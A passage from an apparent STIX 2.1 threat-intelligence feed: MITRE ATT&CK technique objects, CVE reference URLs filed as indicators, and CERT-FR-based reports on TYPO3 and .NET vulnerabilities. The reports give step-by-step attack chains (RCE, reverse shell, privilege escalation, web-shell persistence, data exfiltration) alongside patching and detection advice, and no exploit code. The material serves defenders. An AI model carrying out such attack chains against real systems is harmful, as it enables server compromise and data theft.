      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--d6072495-fa29-5d7f-b145-6b8afc304933"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--37a9b701-5039-58a8-80ee-ab532f1b392b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-49738",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-49738']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e7e8dcc1-8454-575b-93bc-191348ac384e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--37a9b701-5039-58a8-80ee-ab532f1b392b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--418f011f-06ec-562c-8229-8bc150b0aecf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-49740",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-49740']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d3e56db-27fd-5ae6-b8dd-8ec450881842",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--418f011f-06ec-562c-8229-8bc150b0aecf"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8118268e-cf22-5987-b0bb-bc3e95310050",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-49741",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-49741']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6720df7a-0af9-56fa-9597-927ecd846417",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--8118268e-cf22-5987-b0bb-bc3e95310050"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--187cbfa4-fcba-5444-9d06-fe5b9eac9ec3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-49742",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-49742']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:18:23Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3de91c7b-567e-5c5f-a2e4-04f6c935b984",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "indicator--187cbfa4-fcba-5444-9d06-fe5b9eac9ec3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7554ca19-fd6c-511e-8ed4-8eea484d5fcb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1f319f80-5471-5509-a130-d4c6772a4fd5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--65566a4a-8a2a-5d49-9058-6e25c43342b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--01b2941c-62c5-5697-adbf-1aa041412c20",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6fbd7865-7f4b-562e-abb2-d6470ad0b1bf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--946ad5e5-ce82-56b7-8575-f3d844675c68",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--237ec0a8-2e95-569f-99d2-417981a64257",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Typo3 Leading to RCE, Privilege Escalation, and Data Compromise",
      "description": "## Overview\n\nCERT-FR has issued an advisory detailing multiple critical vulnerabilities within the Typo3 content management system (CMS), affecting versions 10.4.x (prior to 10.4.57), 11.x (prior to 11.5.51), 12.x (prior to 12.4.46), 13.x (prior to 13.4.31), and 14.x (prior to 14.3.3). These vulnerabilities, identified on June 9-10, 2026, collectively enable remote arbitrary code execution (RCE), privilege escalation, and significant data confidentiality breaches. Other risks include data integrity compromise, security policy bypass, remote indirect code injection (XSS), and SQL injection (SQLi). Attackers can leverage these flaws by sending specially crafted web requests to unpatched Typo3 instances, allowing them to gain control over the web server, access sensitive information, or escalate their privileges. This poses a severe risk to organizations running vulnerable Typo3 deployments, as successful exploitation could lead to full system compromise and significant operational disruption. While the advisory does not mention active exploitation, the severity of the vulnerabilities warrants immediate attention.\n\n## Attack Chain\n\n1. An attacker identifies an internet-facing Typo3 instance running a vulnerable version (e.g., Typo3 12.3.0) through reconnaissance or automated scanning.\n2. The attacker crafts and sends a malicious HTTP request targeting a vulnerability such as CVE-2026-11607, attempting to achieve remote arbitrary code execution on the Typo3 server.\n3. Upon successful exploitation, the malicious request triggers the execution of an arbitrary command (e.g., a reverse shell, `whoami`, `id`) on the underlying web server process.\n4. The attacker leverages other vulnerabilities (e.g., CVE-2026-47348 for privilege escalation) or misconfigurations to elevate privileges from the web server user to a higher-privileged user on the host system.\n5. The attacker establishes persistent access by installing a web shell, creating new user accounts, or modifying system startup configurations to maintain control.\n6. With elevated privileges, the attacker accesses sensitive data stored on the server (e.g., database credentials, user information) and initiates its exfiltration.\n7. The attacker might deface the website, deploy additional malware, or use the compromised server as a pivot point for further attacks within the network, causing significant operational damage.\n\n## Impact\n\nSuccessful exploitation of these Typo3 vulnerabilities can lead to severe consequences for affected organizations. Attackers gaining remote code execution can fully compromise the underlying web server, leading to data breaches involving sensitive customer or corporate information, potentially causing financial losses, regulatory fines, and reputational damage. Privilege escalation allows attackers to gain administrative control over the server, facilitating further network infiltration, deployment of ransomware, or establishment of long-term persistence. SQL injection and XSS vulnerabilities can lead to database compromise, theft of user session cookies, or delivery of client-side malware to visitors of the compromised website. While specific victim counts are not available, organizations across all sectors utilizing Typo3 are at risk.\n\n## Recommendation\n\n* Apply patches provided by Typo3 for all affected versions (Typo3 \u003c 11.5.51, Typo3 \u003c 12.4.46, Typo3 \u003c 13.4.31, Typo3 \u003c 14.3.3, Typo3 \u003c 10.4.57) immediately.\n* Deploy the Sigma rules provided in this brief, such as 'Detects CVE-2026-11607 Exploitation Attempt - Typo3 RCE via Web Request', to your webserver log monitoring solution to detect exploitation attempts.\n* Implement web application firewalls (WAFs) or intrusion prevention systems (IPS) to block known attack patterns for RCE, SQLi, and XSS as described in the vulnerabilities like CVE-2026-11607, CVE-2026-47348, CVE-2026-47349, and CVE-2026-47350.\n* Regularly review web server access logs for anomalous requests, particularly those containing command injection payloads or SQLi/XSS indicators (refer to 'Detects Typo3 SQL Injection Attempt' and 'Detects Typo3 Cross-Site Scripting (XSS) Attempt' rules).\n",
      "published": "2026-06-14T09:18:23Z",
      "labels": [
        "web-vulnerability",
        "rce",
        "privilege-escalation",
        "data-exfiltration",
        "typo3",
        "cert-fr"
      ],
      "object_refs": [
        "indicator--97aca8b1-c4d4-5fcf-a969-aa26da7517bb",
        "indicator--45244b69-5f39-5799-b8a4-9d33c1c6bcfd",
        "indicator--90d12407-c165-57bb-93a0-a8eb4d24159d",
        "indicator--3ced54bc-e0f6-500e-acc3-b3351d2df72b",
        "indicator--6c196ec0-a9b5-5fcb-bc43-d2a242e6b7c9",
        "indicator--a01c8eea-8361-5a8d-801d-226f5d8a514f",
        "indicator--6db99c6a-8f76-5781-b55f-d10ec9d99d30",
        "indicator--7cda7314-2d04-59c4-89aa-5ed9d8a596f3",
        "indicator--0cd02de9-c40a-56bc-acf0-8aaf0f0c944d",
        "indicator--ddda7fd0-1e12-5240-9eb5-5036dbb524df",
        "indicator--5c53cacd-9d2c-5c27-b63b-57b22b57f600",
        "indicator--2d5acccb-adf8-5789-a660-50ad62a10c9c",
        "indicator--efbec62e-79af-5a5c-9b93-dcd3ae8ce1f8",
        "indicator--a8d04e8e-2cf9-595b-814f-a7da01c00720",
        "indicator--ba490615-1d79-5d88-91fe-7c309d87dc2d",
        "indicator--d6072495-fa29-5d7f-b145-6b8afc304933",
        "indicator--37a9b701-5039-58a8-80ee-ab532f1b392b",
        "indicator--418f011f-06ec-562c-8229-8bc150b0aecf",
        "indicator--8118268e-cf22-5987-b0bb-bc3e95310050",
        "indicator--187cbfa4-fcba-5444-9d06-fe5b9eac9ec3",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0722/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-2j54-93q2-3hjq"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-c78m-c52x-jgwp"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-cg75-qfg2-w9hj"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-chm7-4vch-h8vr"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-f34x-rx2w-7pm3"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-jf56-v8jc-jcc5"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-jh32-v29g-68pq"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-pjpj-v387-x4vq"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-q93m-25xv-94hh"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-qcmw-6rm2-5x78"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-11607"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47348"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47349"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47350"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47351"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-47352"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49738"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49740"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49741"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-49742"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--826c6686-613b-5fba-815c-0e006fd86889",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b38ecaeb-3775-5d24-892a-f6e80c5077fa",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f04cec0e-1703-5133-a1cc-aa8cd894f7a5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b38ecaeb-3775-5d24-892a-f6e80c5077fa",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b38ecaeb-3775-5d24-892a-f6e80c5077fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Microsoft .Net (CVE-2026-45491, CVE-2026-45591)",
      "description": "## Overview\n\nOn June 10, 2026, the CERT-FR issued an advisory detailing multiple vulnerabilities, CVE-2026-45491 and CVE-2026-45591, affecting various versions of Microsoft .Net and ASP.NET Core. These vulnerabilities enable a remote attacker to achieve a denial of service (DoS) state, rendering applications and services unavailable, and to compromise the integrity of data processed by vulnerable applications. The affected scope is broad, encompassing .Net 8.0, 9.0, and 10.0, as well as ASP.NET Core 8.0, 9.0, and 10.0, running on Windows, Linux, and macOS environments. These flaws pose a significant risk to organizations relying on vulnerable .Net applications, as they can lead to operational disruption and untrusted data, underscoring the importance of prompt patching.\n\n## Attack Chain\n\n1.  Attacker identifies a public-facing application or service built with a vulnerable Microsoft .Net or ASP.NET Core version (e.g., .NET 10.0 \u003c 10.0.9, ASP.NET Core 8.0 \u003c 8.0.28).\n2.  The attacker crafts a malicious input or request specifically designed to exploit CVE-2026-45491 or CVE-2026-45591, targeting the application's processing logic.\n3.  The vulnerable .Net or ASP.NET Core runtime processes the malformed data, triggering the vulnerability.\n4.  For denial of service (DoS) attacks, the vulnerability causes the application or underlying service to crash, hang, or consume excessive resources, making it unresponsive to legitimate users.\n5.  For data integrity compromise, the vulnerability allows unauthorized modification or corruption of data handled by the application, potentially leading to incorrect computations, unauthorized state changes, or other forms of data manipulation.\n6.  The application either becomes unavailable, experiences significant performance degradation, or operates with compromised data, directly impacting business operations and trust.\n\n## Impact\n\nThe successful exploitation of these vulnerabilities can lead to significant operational disruption and data reliability issues. A remote denial of service attack can render critical applications and services inaccessible, leading to financial losses, reputational damage, and inability to conduct business. Data integrity compromise can result in corrupted databases, inaccurate financial records, or manipulated user data, undermining trust and potentially leading to compliance violations or incorrect decision-making. While specific victim counts or targeted sectors are not detailed, any organization utilizing affected .Net or ASP.NET Core versions is at risk, particularly those with internet-facing applications.\n\n## Recommendation\n\n*   Immediately apply the security updates provided by Microsoft for all affected .NET and ASP.NET Core versions as referenced in the CERTFR-2026-AVI-0729 advisory and the MSRC bulletins for CVE-2026-45491 and CVE-2026-45591.\n*   Deploy the provided Sigma rules to your SIEM/EDR to detect potential exploitation attempts or post-exploitation activities related to the observed vulnerabilities.\n*   Enable comprehensive logging for web servers (like IIS or Kestrel) and application runtimes (`dotnet.exe` process creation) to capture anomalies that the rules are designed to detect.\n*   Monitor for excessive 5xx HTTP status codes in web server logs, which can indicate ongoing denial of service attempts or application crashes as per the `Detect Excessive Web Server 5xx Errors` rule.\n*   Enable process creation logging, especially for `dotnet.exe` or `w3wp.exe`, to detect suspicious child processes as per the `Detect Suspicious Child Process from Dotnet Host` rule.\n",
      "published": "2026-06-14T09:19:42Z",
      "labels": [
        "vulnerability",
        "denial-of-service",
        "data-integrity",
        "dotnet",
        "microsoft"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0729/"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45491"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45591"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45491"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45591"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--83e53297-033d-55d3-981c-cd9c8980900a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10883",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10883']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--838aa8f6-97f7-57c8-a4ac-522e9ce2c5e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--83e53297-033d-55d3-981c-cd9c8980900a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c69c3743-f973-570b-832c-22966c34ee7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10892",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10892']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--486eb362-c553-5285-9b12-0cf32c745bea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--c69c3743-f973-570b-832c-22966c34ee7d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--df397a5c-9479-5c9a-b3ba-e5330d744260",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10923",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10923']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3337865b-f9ab-58d6-b015-5fc045c60ff6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--df397a5c-9479-5c9a-b3ba-e5330d744260"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--29b1a76d-8e93-59ea-9f40-ead656221ca7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10929",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10929']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3670315f-1ecc-5dc8-9255-4b330eae93c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--29b1a76d-8e93-59ea-9f40-ead656221ca7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2a91e2df-2780-5a3b-8a56-006d4de20595",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10934",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10934']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--593bf1bb-7046-5329-948e-55a6725b7800",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--2a91e2df-2780-5a3b-8a56-006d4de20595"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c00ca9b9-f174-5370-abe9-7a5db66717f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10953",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10953']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0d71dcc-1b4b-5888-9aca-e97026275305",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--c00ca9b9-f174-5370-abe9-7a5db66717f4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7019d97a-6f8d-51da-bd1b-de8281f22d86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10959",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10959']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--902abc70-562c-5826-a20d-6304d53458a4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--7019d97a-6f8d-51da-bd1b-de8281f22d86"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a1ebc3a8-9b84-5848-95f6-b61ae1e0f9a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10967",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10967']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4157392b-4ed1-54ac-ace9-cf58e0895a03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--a1ebc3a8-9b84-5848-95f6-b61ae1e0f9a0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a9d902ed-1bae-50e3-ab3e-da604c5dab13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10984",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-10984']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25a008ae-d143-5571-b258-5ca3573caee5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b8d58bcf-6b72-5d98-be08-fbb72225f818",
      "target_ref": "indicator--a9d902ed-1bae-50e3-ab3e-da604c5dab13"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c3bb9f3c-ba23-5125-bc81-225fb059277b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11007",
      "pattern": "[url:value = 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-11007']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:21:19Z"
    },
